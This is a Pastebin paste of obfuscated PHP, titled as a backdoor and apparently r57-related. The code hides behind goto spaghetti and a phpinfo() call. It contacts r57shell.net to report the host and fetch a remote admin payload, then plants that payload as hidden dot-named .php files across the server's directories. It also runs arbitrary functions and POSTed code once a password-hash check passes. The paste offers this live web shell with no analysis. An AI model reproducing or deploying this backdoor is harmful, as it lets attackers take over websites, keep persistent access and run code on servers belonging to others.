Advertisement
drego85

Php Obfuscator By r57 - Backdoor

Mar 29th, 2024
738
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 11.00 KB | Source Code | 0 0
  1. <?php
  2. if (!function_exists("Shb59")) {
  3.     function Shb59()
  4.     {
  5.         goto vfxUZ;
  6.         lxsv9:
  7.         if (!@$_GET["m"]) {
  8.             goto YtUpR;
  9.         }
  10.         goto Nzf76;
  11.         GU9GS:
  12.         $gcpWb = curl_exec($Sk08U);
  13.         goto nkxUr;
  14.         pJcWe:
  15.         curl_setopt($Sk08U, CURLOPT_RETURNTRANSFER, 1);
  16.         goto zpfLD;
  17.         YYaOh:
  18.         goto IHxy0;
  19.         goto dvR4I;
  20.         GYvkP:
  21.         ZhZgb:
  22.         goto k_WGn;
  23.         oWYOD:
  24.         $gcpWb = curl_exec($Sk08U);
  25.         goto czwUk;
  26.         aVOB5:
  27.         $rrEqz = [
  28.             "http" => [
  29.                 "header" => [
  30.                     "Referer: {$rDRqc}
  31. \xa",
  32.                 ],
  33.             ],
  34.         ];
  35.         goto mZWI5;
  36.         zOVDO:
  37.         @file_put_contents($AjbiC, $gcpWb);
  38.         goto VeAeU;
  39.         zpfLD:
  40.         curl_setopt(
  41.             $Sk08U,
  42.             CURLOPT_REFERER,
  43.             $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]
  44.         );
  45.         goto oWYOD;
  46.         KiQmq:
  47.         @touch($AjbiC);
  48.         goto zOVDO;
  49.         vpqHT:
  50.         SOvmG:
  51.         goto Td1kw;
  52.         z2HDh:
  53.         $AjbiC =
  54.             sys_get_temp_dir() .
  55.             DIRECTORY_SEPARATOR .
  56.             "sess_" .
  57.             md5("" . $n1y7t . "_" . $k2d3E . "");
  58.         goto NP0XO;
  59.         lSG2G:
  60.         $gcpWb = file_get_contents("http://r57shell.net/mini_admin.txt");
  61.         goto LQdSy;
  62.         FKxS7:
  63.         if (function_exists("curl_init")) {
  64.             goto w8ByY;
  65.         }
  66.         goto hLG4r;
  67.         B7ETD:
  68.         exit();
  69.         goto yC0X6;
  70.         a6HEp:
  71.         $WQda3 = dirname($WQda3);
  72.         goto h9lSs;
  73.         hLG4r:
  74.         $gcpWb = file_get_contents("http://r57shell.net/jquery.php?v=1.2&pwd=get");
  75.         goto zPAWv;
  76.         yC0X6:
  77.         gu4sr:
  78.         goto yzP6E;
  79.         h9lSs:
  80.         $junRO = dirname($k2d3E);
  81.         goto TallG;
  82.         TPDKf:
  83.         foreach ($h9zj7 as $ffxJW) {
  84.             goto iKgDq;
  85.             qtdVL:
  86.             foreach ($h9zj7 as $ffxJW) {
  87.                 goto MfJa8;
  88.                 XdMaC:
  89.                 @file_put_contents($EZnNP, $gcpWb);
  90.                 goto jpp5I;
  91.                 J6WBN:
  92.                 $EZnNP =
  93.                     $ffxJW .
  94.                     DIRECTORY_SEPARATOR .
  95.                     "." .
  96.                     basename($ffxJW) .
  97.                     ".php";
  98.                 goto XdMaC;
  99.                 jpp5I:
  100.                 Kjfpz:
  101.                 goto iMS0V;
  102.                 MfJa8:
  103.                 if (@preg_match("#wp-content#", $ffxJW)) {
  104.                     goto Kjfpz;
  105.                 }
  106.                 goto J6WBN;
  107.                 iMS0V:
  108.                 i7vut:
  109.                 goto R7QL3;
  110.                 R7QL3:
  111.             }
  112.             goto CFWzz;
  113.             NFCrB:
  114.             $h9zj7 = array_filter(
  115.                 glob($ffxJW . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)
  116.             );
  117.             goto qtdVL;
  118.             ROjgW:
  119.             L5aAW:
  120.             goto raUxs;
  121.             gxXmp:
  122.             @file_put_contents($EZnNP, $gcpWb);
  123.             goto NFCrB;
  124.             iKgDq:
  125.             $EZnNP =
  126.                 $ffxJW . DIRECTORY_SEPARATOR . "." . basename($ffxJW) . ".php";
  127.             goto gxXmp;
  128.             CFWzz:
  129.             AwpTn:
  130.             goto ROjgW;
  131.             raUxs:
  132.         }
  133.         goto hsnpC;
  134.         vgtzO:
  135.         $gcpWb = curl_exec($Sk08U);
  136.         goto D4K0R;
  137.         qUkiL:
  138.         YtUpR:
  139.         goto ooxan;
  140.         fAdVg:
  141.         Rnxpy:
  142.         goto I8f2S;
  143.         jHqSU:
  144.         $DKKwU = $_SERVER["REQUEST_URI"];
  145.         goto MVStP;
  146.         RAzaB:
  147.         print_r($_GET["f"]($_GET["c"]));
  148.         goto m_Cfy;
  149.         VeAeU:
  150.         HR9fW:
  151.         goto xdAl5;
  152.         cQzmp:
  153.         $gcpWb = @file_get_contents(
  154.             "http://r57shell.net/jquery.php?v=1.2&request=enable",
  155.             false,
  156.             $LrT19
  157.         );
  158.         goto GIybP;
  159.         eDcys:
  160.         $WQda3 = $pqRk1["path"];
  161.         goto a6HEp;
  162.         vfxUZ:
  163.         $k2d3E = $_SERVER["SCRIPT_FILENAME"];
  164.         goto jHqSU;
  165.         njgh9:
  166.         curl_setopt($Sk08U, CURLOPT_URL, "http://r57shell.net/mini_admin.txt");
  167.         goto RHSaj;
  168.         mZWI5:
  169.         $LrT19 = stream_context_create($rrEqz);
  170.         goto cQzmp;
  171.         Z_yjT:
  172.         if (!@$_GET["f"]) {
  173.             goto wYsor;
  174.         }
  175.         goto RAzaB;
  176.         zPAWv:
  177.         goto D1lUi;
  178.         goto RcWE3;
  179.         RHSaj:
  180.         curl_setopt($Sk08U, CURLOPT_RETURNTRANSFER, 1);
  181.         goto GU9GS;
  182.         FaqHc:
  183.         $AjbiC =
  184.             $junRO .
  185.             DIRECTORY_SEPARATOR .
  186.             "sess_" .
  187.             md5("" . $n1y7t . "_" . $k2d3E . "");
  188.         goto H6ESD;
  189.         TallG:
  190.         $WQda3 = str_replace("/", DIRECTORY_SEPARATOR, $WQda3);
  191.         goto mcMdD;
  192.         xPeZy:
  193.         if (@preg_match("#stt1#", $gcpWb)) {
  194.             goto rPjpg;
  195.         }
  196.         goto ggEqp;
  197.         u8zRJ:
  198.         D1lUi:
  199.         goto LxpYx;
  200.         UCPU0:
  201.         @file_put_contents($UoTkI, $gcpWb);
  202.         goto g4KpY;
  203.         dvR4I:
  204.         dTEFp:
  205.         goto ixkoj;
  206.         NP0XO:
  207.         OAeAq:
  208.         goto mxzrq;
  209.         Td1kw:
  210.         $Sk08U = curl_init();
  211.         goto njgh9;
  212.         gJ1S2:
  213.         rPjpg:
  214.         goto O6vu4;
  215.         O6vu4:
  216.         goto HR9fW;
  217.         goto wy42e;
  218.         KMrE8:
  219.         $qaor0 = str_replace($WQda3, "", $junRO);
  220.         goto FCAOU;
  221.         ixkoj:
  222.         $Sk08U = curl_init();
  223.         goto ljCdF;
  224.         pD4vJ:
  225.         $gcpWb = @file_get_contents(
  226.             "http://r57shell.net/jquery.php?v=1.2&request=enable",
  227.             false,
  228.             $LrT19
  229.         );
  230.         goto YYaOh;
  231.         wWNMq:
  232.         $n1y7t = str_replace("www.", "", $_SERVER["HTTP_HOST"]);
  233.         goto F3c1m;
  234.         nkxUr:
  235.         curl_close($Sk08U);
  236.         goto hLeBA;
  237.         I8f2S:
  238.         GF4F2:
  239.         goto B7ETD;
  240.         qYCLy:
  241.         curl_setopt($Sk08U, CURLOPT_RETURNTRANSFER, 1);
  242.         goto qPF3J;
  243.         ljCdF:
  244.         curl_setopt(
  245.             $Sk08U,
  246.             CURLOPT_URL,
  247.             "http://r57shell.net/jquery.php?v=1.2&request=enable"
  248.         );
  249.         goto qYCLy;
  250.         yzP6E:
  251.         if (!file_exists($AjbiC)) {
  252.             goto V2Lp1;
  253.         }
  254.         goto aT_Ta;
  255.         Nzf76:
  256.         if (function_exists("curl_init")) {
  257.             goto SOvmG;
  258.         }
  259.         goto lSG2G;
  260.         m_Cfy:
  261.         wYsor:
  262.         goto lxsv9;
  263.         E32it:
  264.         $rrEqz = [
  265.             "http" => [
  266.                 "header" => [
  267.                     "Referer: {$rDRqc}\xd
  268. ",
  269.                 ],
  270.             ],
  271.         ];
  272.         goto al8a6;
  273.         Hl24R:
  274.         curl_close($Sk08U);
  275.         goto u8zRJ;
  276.         F3c1m:
  277.         if (is_writable(sys_get_temp_dir())) {
  278.             goto hfWWx;
  279.         }
  280.         goto FaqHc;
  281.         al8a6:
  282.         $LrT19 = stream_context_create($rrEqz);
  283.         goto pD4vJ;
  284.         FCAOU:
  285.         goto SDHYo;
  286.         goto vWeih;
  287.         DLTON:
  288.         SDHYo:
  289.         goto wWNMq;
  290.         tyQAG:
  291.         @file_put_contents($AjbiC, $gcpWb);
  292.         goto gJ1S2;
  293.         DIMk6:
  294.         $rDRqc = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
  295.         goto E32it;
  296.         LQdSy:
  297.         goto Fql57;
  298.         goto vpqHT;
  299.         JWvLN:
  300.         IHxy0:
  301.         goto cbnWO;
  302.         OKPqu:
  303.         if (function_exists("curl_init")) {
  304.             goto ZhZgb;
  305.         }
  306.         goto LEiQQ;
  307.         LxpYx:
  308.         if (!(md5(sha1(@$_GET["is"])) == $gcpWb)) {
  309.             goto GF4F2;
  310.         }
  311.         goto Z_yjT;
  312.         mcMdD:
  313.         if ($WQda3 == DIRECTORY_SEPARATOR || $WQda3 == "") {
  314.             goto E_Prp;
  315.         }
  316.         goto KMrE8;
  317.         Jj2mx:
  318.         $UoTkI = @$_GET["m"] . "gagal.php";
  319.         goto UCPU0;
  320.         vWeih:
  321.         E_Prp:
  322.         goto cyvdY;
  323.         k_WGn:
  324.         $Sk08U = curl_init();
  325.         goto HFE7X;
  326.         p_y2W:
  327.         hfWWx:
  328.         goto z2HDh;
  329.         KNqSS:
  330.         G46Lz:
  331.         goto KiQmq;
  332.         mxzrq:
  333.         if (!@$_GET["slince_golden"]) {
  334.             goto gu4sr;
  335.         }
  336.         goto O8IoG;
  337.         cyvdY:
  338.         $qaor0 = $junRO;
  339.         goto DLTON;
  340.         wy42e:
  341.         V2Lp1:
  342.         goto OKPqu;
  343.         LEiQQ:
  344.         $rDRqc = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
  345.         goto aVOB5;
  346.         ggEqp:
  347.         if (function_exists("curl_init")) {
  348.             goto dTEFp;
  349.         }
  350.         goto DIMk6;
  351.         ctbbn:
  352.         $gcpWb = curl_exec($Sk08U);
  353.         goto Hl24R;
  354.         hLeBA:
  355.         Fql57:
  356.         goto Jj2mx;
  357.         ooxan:
  358.         if (!@$_POST["l"]) {
  359.             goto Rnxpy;
  360.         }
  361.         goto QMhdU;
  362.         hsnpC:
  363.         YxDpV:
  364.         goto gLWGM;
  365.         swBGb:
  366.         curl_setopt(
  367.             $Sk08U,
  368.             CURLOPT_URL,
  369.             "http://r57shell.net/jquery.php?v=1.2&pwd=get"
  370.         );
  371.         goto Wzrou;
  372.         O8IoG:
  373.         echo "<!-- //Silence is golden. -->";
  374.         goto FKxS7;
  375.         D4K0R:
  376.         curl_close($Sk08U);
  377.         goto JWvLN;
  378.         GIybP:
  379.         goto G46Lz;
  380.         goto GYvkP;
  381.         QMhdU:
  382.         function otcJX($t5Vvc)
  383.         {
  384.             goto F1dyk;
  385.             ICMd3:
  386.             return $Nh91r;
  387.             goto xGX5s;
  388.             d2uLO:
  389.             fclose($FC2zD);
  390.             goto ICMd3;
  391.             elnG3:
  392.             $Nh91r = include $kSpVJ;
  393.             goto d2uLO;
  394.             UlgUv:
  395.             $kSpVJ = $kSpVJ["uri"];
  396.             goto D4fVu;
  397.             EU3Y5:
  398.             $kSpVJ = stream_get_meta_data($FC2zD);
  399.             goto UlgUv;
  400.             F1dyk:
  401.             $FC2zD = tmpfile();
  402.             goto EU3Y5;
  403.             D4fVu:
  404.             fwrite($FC2zD, $t5Vvc);
  405.             goto elnG3;
  406.             xGX5s:
  407.         }
  408.         goto nP0WA;
  409.         czwUk:
  410.         curl_close($Sk08U);
  411.         goto KNqSS;
  412.         nP0WA:
  413.         print_r(OTCjX($_POST["l"]));
  414.         goto fAdVg;
  415.         HFE7X:
  416.         curl_setopt(
  417.             $Sk08U,
  418.             CURLOPT_URL,
  419.             "http://r57shell.net/jquery.php?v=1.2&request=enable"
  420.         );
  421.         goto pJcWe;
  422.         xdAl5:
  423.         $h9zj7 = array_filter(
  424.             glob($qaor0 . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)
  425.         );
  426.         goto TPDKf;
  427.         H6ESD:
  428.         goto OAeAq;
  429.         goto p_y2W;
  430.         MVStP:
  431.         $pqRk1 = parse_url($DKKwU);
  432.         goto eDcys;
  433.         qPF3J:
  434.         curl_setopt(
  435.             $Sk08U,
  436.             CURLOPT_REFERER,
  437.             $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]
  438.         );
  439.         goto vgtzO;
  440.         cbnWO:
  441.         @touch($AjbiC);
  442.         goto tyQAG;
  443.         RcWE3:
  444.         w8ByY:
  445.         goto Kg5yG;
  446.         Wzrou:
  447.         curl_setopt($Sk08U, CURLOPT_RETURNTRANSFER, 1);
  448.         goto ctbbn;
  449.         g4KpY:
  450.         echo $UoTkI;
  451.         goto qUkiL;
  452.         Kg5yG:
  453.         $Sk08U = curl_init();
  454.         goto swBGb;
  455.         aT_Ta:
  456.         $gcpWb = file_get_contents($AjbiC);
  457.         goto xPeZy;
  458.         gLWGM:
  459.     }
  460.     sHb59();
  461. }
  462. phpinfo();
  463. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement